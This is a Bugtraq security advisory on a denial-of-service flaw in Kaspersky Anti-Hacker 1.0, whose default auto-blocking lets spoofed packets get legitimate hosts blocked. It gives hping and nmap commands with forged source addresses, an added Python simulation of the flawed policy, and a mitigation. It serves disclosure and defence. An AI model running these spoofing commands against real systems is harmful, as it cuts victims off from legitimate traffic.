Bugtraq mailing list archives

Easy DoS on Kaspersky Anti-Hacker v1.0


From: Bojan Zdrnja <Bojan.Zdrnja () LSS hr>
Date: Thu, 20 Mar 2003 08:29:08 +1200


Product: Kaspersky Anti-Hacker
Version: 1.0
Website: http://www.kaspersky.com/buyonline.html?info=967571

1. Introduction
---------------

Kaspersky Anti-Hacker is a Kaspersky Lab personal firewall product. Like other
products in this category, Kaspersky Anti-Hacker allows the creation of packet
and application filtering rules.

Among other things, Kaspersky Anti-Hacker includes a very simple intrusion
detection system. This IDS module is automatically activated upon installation
of the product. The IDS can detect only 7 attacks, including port scanning and
SYN/UDP flooding. Together with the IDS, the firewall can also actively block
detected attacks. This option (which is turned on by default) makes DoS attacks
on remote users running Kaspersky Anti-Hacker very easy.


2. Exploit
----------

If active blocking is turned on, upon detection of a known attack, Kaspersky
Anti-Hacker will block *ALL* traffic to the source IP address detected in the
attack. By sending spoofed packets to a remote machine running Kaspersky
Anti-Hacker, an attacker can easily deny legitimate traffic to any IP address.

Example with hping2:

# hping -S -i u1 -s +1025 -p +21 <victims_IP_address> -w 3072 -a \
<spoofed_IP_address>

Kaspersky Anti-Hacker will report this attack as a SYN flood and will
automatically block all traffic to spoofed_IP_address.

The same thing can be accomplished with nmap's decoy option:

# nmap -sS -P0 -D<spoofed_IP_address> <victims_IP_address>

This time Kaspersky Anti-Hacker will detect a port scanning attack and
automatically block all traffic to spoofed_IP_address.


3. Solution
-----------

Disable the "Assaulter blocking time" option. Kaspersky Anti-Hacker will still
report possible attacks and the user can stop them manually.
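The design flaw behind sections 2 and 3, as an added example that is not part of the advisory and not Kaspersky code: a model of a personal firewall whose tiny IDS blocks the source address of whatever it flags. The detector thresholds, the two detectors, the addresses and the class names are assumptions. It shows that with auto-blocking on, packets carrying a forged source address get a legitimate peer blocked, while with auto-blocking off (the advisory's fix) the alert still fires but the peer's traffic continues.

```python
# Added example: model of a reactive "block the source IP on detection" policy,
# showing why it is a denial-of-service vector when the trigger can be spoofed.
# Constructed simulation; thresholds, detectors and names are assumptions,
# not Kaspersky Anti-Hacker internals.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str    # source IP as seen on the wire (not authenticated)
    dst: str
    dport: int
    flags: str  # "S" = bare SYN, "SA" = SYN/ACK, "A" = ACK


class HostFirewall:
    """Personal firewall with a minimal IDS. With auto_block=True it mirrors the
    advisory's default: every later packet from a source that triggered an
    alert is dropped. With auto_block=False it only records the alert."""

    SYN_FLOOD_THRESHOLD = 100   # assumed: bare SYNs from one source
    PORT_SCAN_THRESHOLD = 20    # assumed: distinct ports probed by one source

    def __init__(self, auto_block: bool):
        self.auto_block = auto_block
        self.blocked = set()
        self.alerts = []
        self._syns = defaultdict(int)
        self._ports = defaultdict(set)

    def _detect(self, pkt):
        # Only bare SYNs feed the two detectors; each fires once per source.
        if pkt.flags != "S":
            return None
        self._syns[pkt.src] += 1
        self._ports[pkt.src].add(pkt.dport)
        if self._syns[pkt.src] == self.SYN_FLOOD_THRESHOLD:
            return "syn_flood"
        if len(self._ports[pkt.src]) == self.PORT_SCAN_THRESHOLD:
            return "port_scan"
        return None

    def inbound(self, pkt):
        """Return 'accepted' or 'dropped' for one inbound packet."""
        if pkt.src in self.blocked:
            return "dropped"
        attack = self._detect(pkt)
        if attack:
            self.alerts.append((attack, pkt.src))
            if self.auto_block:
                self.blocked.add(pkt.src)   # keyed on an unauthenticated field
                return "dropped"
        return "accepted"


VICTIM = "198.51.100.5"   # constructed addresses from RFC 5737 documentation ranges
PEER = "192.0.2.10"       # a host the victim legitimately talks to, e.g. its DNS server


def simulate(auto_block, attack):
    """Run a forged-source attack against the victim's firewall, then check
    whether a genuine reply from PEER still gets through.
    Returns (alert_names, verdict_for_peer_reply)."""
    fw = HostFirewall(auto_block)
    if attack == "syn_flood":
        # many bare SYNs to one port, source forged as PEER
        forged = [Packet(PEER, VICTIM, 21, "S")] * HostFirewall.SYN_FLOOD_THRESHOLD
    else:
        # decoy-style scan: one SYN per port, source forged as PEER
        forged = [Packet(PEER, VICTIM, p, "S")
                  for p in range(1, HostFirewall.PORT_SCAN_THRESHOLD + 1)]
    for pkt in forged:
        fw.inbound(pkt)
    # PEER now answers a connection the victim itself opened (SYN/ACK back
    # to the victim's ephemeral port); this is the traffic that gets lost.
    reply = Packet(PEER, VICTIM, 49152, "SA")
    return [name for name, _ in fw.alerts], fw.inbound(reply)


if __name__ == "__main__":
    for mode in (True, False):
        for attack in ("syn_flood", "port_scan"):
            alerts, verdict = simulate(mode, attack)
            print(f"auto_block={mode!s:5} {attack:9} alerts={alerts} "
                  f"peer reply: {verdict}")
```

The point the model makes is that the block decision is keyed on the source address of packets that were never authenticated (no completed handshake), so whoever can forge that address chooses who gets blocked; turning the automatic block off keeps the detection value while removing the attacker-controlled action.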


4. Vendor
---------

Vendor notified, no response received.


Best regards,

Bojan Zdrnja

